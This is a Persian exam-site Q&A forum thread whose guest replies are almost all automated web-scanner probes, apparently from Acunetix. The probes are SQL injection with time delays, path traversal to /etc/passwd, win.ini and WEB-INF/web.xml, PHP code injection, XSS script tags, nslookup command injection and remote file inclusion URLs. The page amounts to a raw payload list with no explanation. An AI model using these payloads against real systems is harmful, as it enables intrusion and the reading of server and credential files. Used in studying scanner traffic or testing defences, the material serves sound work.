خانه ایجاد آزمون (ویژه اساتید) درخواست آزمون پشتیبانی اخبار تماس با ما درباره ما

پرسش و پاسخ آزمون 26 آبان

سوالات و مباحث مربوط به آزمون سوم (26 آبان 1395) را در این بخش مطرح نمایید.

تاریخ ارسال: 1395-8-26
199 پاسخ
مهمان 11 مهر 1396 - 15:26

1

مهمان 21 مهر 1396 - 13:56

1

مهمان 21 مهر 1396 - 14:22

response.write(9885661*9643883)

مهمان 21 مهر 1396 - 14:22

'+response.write(9885661*9643883)+'

مهمان 21 مهر 1396 - 14:22

"+response.write(9885661*9643883)+"

مهمان 21 مهر 1396 - 14:22

J1XK8Z73

مهمان 21 مهر 1396 - 14:22

${10000324+9999775}

مهمان 21 مهر 1396 - 14:22

set|set&set

مهمان 21 مهر 1396 - 14:22

$(nslookup T4WxrRDh)

مهمان 21 مهر 1396 - 14:22

12345'"\'\");|]*{ <>�''????

مهمان 21 مهر 1396 - 14:22

&nslookup SFroRgAJ&'\"`0&nslookup SFroRgAJ&`'

مهمان 21 مهر 1396 - 14:22

'"()

مهمان 21 مهر 1396 - 14:22

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

مهمان 21 مهر 1396 - 14:22

1some_inexistent_file_with_long_name.jpg

مهمان 21 مهر 1396 - 14:22

)

مهمان 21 مهر 1396 - 14:22

http://testasp.vulnweb.com/t/xss.html?%00.jpg

مهمان 21 مهر 1396 - 14:22

Http://testasp.vulnweb.com/t/fit.txt

مهمان 21 مهر 1396 - 14:22

!(()&&!|*|*|

مهمان 21 مهر 1396 - 14:22

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 21 مهر 1396 - 14:22

^(#$!@#$)(()))******

مهمان 21 مهر 1396 - 14:22

testasp.vulnweb.com

مهمان 21 مهر 1396 - 14:22

http://hit7iVZE8rFq3.bxss.me/

مهمان 21 مهر 1396 - 14:22

;print(md5(acunetix_wvs_security_test));

مهمان 21 مهر 1396 - 14:22

';print(md5(acunetix_wvs_security_test));$a='

مهمان 21 مهر 1396 - 14:22

";print(md5(acunetix_wvs_security_test));$a="

مهمان 21 مهر 1396 - 14:22

${@print(md5(acunetix_wvs_security_test))}

مهمان 21 مهر 1396 - 14:22

post-comment-topic

مهمان 21 مهر 1396 - 14:22

${@print(md5(acunetix_wvs_security_test))}\

مهمان 21 مهر 1396 - 14:22

post-comment-topic

مهمان 21 مهر 1396 - 14:22

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 21 مهر 1396 - 14:22

post-comment-topic/.

مهمان 21 مهر 1396 - 14:23

/www.vulnweb.com

مهمان 21 مهر 1396 - 14:23

'"

مهمان 21 مهر 1396 - 14:23

مهمان 21 مهر 1396 - 14:23

1'"

مهمان 21 مهر 1396 - 14:23

1'"()&%<acx><script>WPZR(9382)</script></acx>

مهمان 21 مهر 1396 - 14:23

\

مهمان 21 مهر 1396 - 14:23

'"()&%<acx><script>WPZR(9172)</script></acx>

مهمان 21 مهر 1396 - 14:23

1����

مهمان 21 مهر 1396 - 14:23

@@ZQXyG

مهمان 21 مهر 1396 - 14:23

1_9044

مهمان 21 مهر 1396 - 14:23

JyI=

مهمان 21 مهر 1396 - 14:23

�'�"

مهمان 21 مهر 1396 - 14:23

�''�""

مهمان 21 مهر 1396 - 14:23

(select convert(int,CHAR(65)))

مهمان 21 مهر 1396 - 14:23

1

مهمان 21 مهر 1396 - 14:23

1

مهمان 21 مهر 1396 - 14:23

OFn2YPkQ

مهمان 21 مهر 1396 - 14:23

-1 OR 2+922-922-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

-1 OR 2+842-842-1=0+0+0+1

مهمان 21 مهر 1396 - 14:23

-1' OR 2+845-845-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

-1' OR 2+82-82-1=0+0+0+1 or 'qhFcokjk'='

مهمان 21 مهر 1396 - 14:23

-1" OR 2+642-642-1=0+0+0+1 --

مهمان 21 مهر 1396 - 14:23

if(now()=sysdate(),sleep(14),0)/*'XOR(if(now()=sysdate(),sleep(14),0))OR'"XOR(if(now()=sysdate(),sleep(14),0))OR"*/

مهمان 21 مهر 1396 - 14:23

(select(0)from(select(sleep(14)))v)/*'+(select(0)from(select(sleep(14)))v)+'"+(select(0)from(select(sleep(14)))v)+"*/

مهمان 21 مهر 1396 - 14:23

-1; waitfor delay '0:0:21' --

مهمان 21 مهر 1396 - 14:23

-1); waitfor delay '0:0:7' --

مهمان 21 مهر 1396 - 14:23

1 waitfor delay '0:0:7' --

مهمان 21 مهر 1396 - 14:23

X80DKSX8'; waitfor delay '0:0:7' --

مهمان 21 مهر 1396 - 14:23

-1;select pg_sleep(14); --

مهمان 21 مهر 1396 - 14:23

-1);select pg_sleep(14); --

مهمان 21 مهر 1396 - 14:23

-1));select pg_sleep(21); --

مهمان 21 مهر 1396 - 14:23

0H4VpzVr';select pg_sleep(21); --

مهمان 21 مهر 1396 - 14:23

3c5FbYFK');select pg_sleep(7); --

مهمان 21 مهر 1396 - 14:23

SZxOBYkX'));select pg_sleep(14); --

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../etc/passwd

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../../../../../../proc/version

مهمان 21 مهر 1396 - 14:24

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../etc/passwd.jpg

مهمان 21 مهر 1396 - 14:24

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 21 مهر 1396 - 14:24

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 21 مهر 1396 - 14:24

1

مهمان 21 مهر 1396 - 14:24

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

مهمان 21 مهر 1396 - 14:24

/etc/passwd

مهمان 21 مهر 1396 - 14:24

%2fetc%2fpasswd

مهمان 21 مهر 1396 - 14:24

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 21 مهر 1396 - 14:24

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 21 مهر 1396 - 14:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 21 مهر 1396 - 14:24

..��..��..��..��..��..��..��..��etc/passwd

مهمان 21 مهر 1396 - 14:24

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 21 مهر 1396 - 14:24

file:///etc/passwd

مهمان 21 مهر 1396 - 14:24

/\../\../\../\../\../\../\../etc/passwd

مهمان 21 مهر 1396 - 14:24

WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

/WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

WEB-INF\web.xml

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../windows/win.ini

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../boot.ini

مهمان 21 مهر 1396 - 14:24

../../../../../../../../../../windows/win.ini.jpg

مهمان 21 مهر 1396 - 14:24

������������������������������������������������windows��win.ini

مهمان 21 مهر 1396 - 14:24

................windowswin.ini

مهمان 21 مهر 1396 - 14:24

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 21 مهر 1396 - 14:24

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 21 مهر 1396 - 14:24

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 21 مهر 1396 - 14:24

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 21 مهر 1396 - 14:24

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 21 مهر 1396 - 14:24

WEB-INF/web.xml

مهمان 21 مهر 1396 - 14:24

WEB-INF\web.xml

مهمان 11 مهر 1396 - 14:50

WEB-INF\web.xml

مهمان 11 مهر 1396 - 15:26

1

مهمان 11 مهر 1396 - 14:50

WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:50

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 11 مهر 1396 - 14:50

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 11 مهر 1396 - 14:50

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 11 مهر 1396 - 14:50

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 11 مهر 1396 - 14:50

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 11 مهر 1396 - 14:50

................windowswin.ini

مهمان 11 مهر 1396 - 14:50

������������������������������������������������windows��win.ini

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../windows/win.ini.jpg

مهمان 11 مهر 1396 - 14:50

C:\WINDOWS\system32\drivers\etc\hosts

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../windows/win.ini

مهمان 11 مهر 1396 - 14:50

WEB-INF\web.xml

مهمان 11 مهر 1396 - 14:50

/WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:50

WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:50

/\../\../\../\../\../\../\../etc/passwd

مهمان 11 مهر 1396 - 14:50

file:///etc/passwd

مهمان 11 مهر 1396 - 14:50

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 11 مهر 1396 - 14:50

..��..��..��..��..��..��..��..��etc/passwd

مهمان 11 مهر 1396 - 14:50

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 11 مهر 1396 - 14:50

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 11 مهر 1396 - 14:50

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 11 مهر 1396 - 14:50

%2fetc%2fpasswd

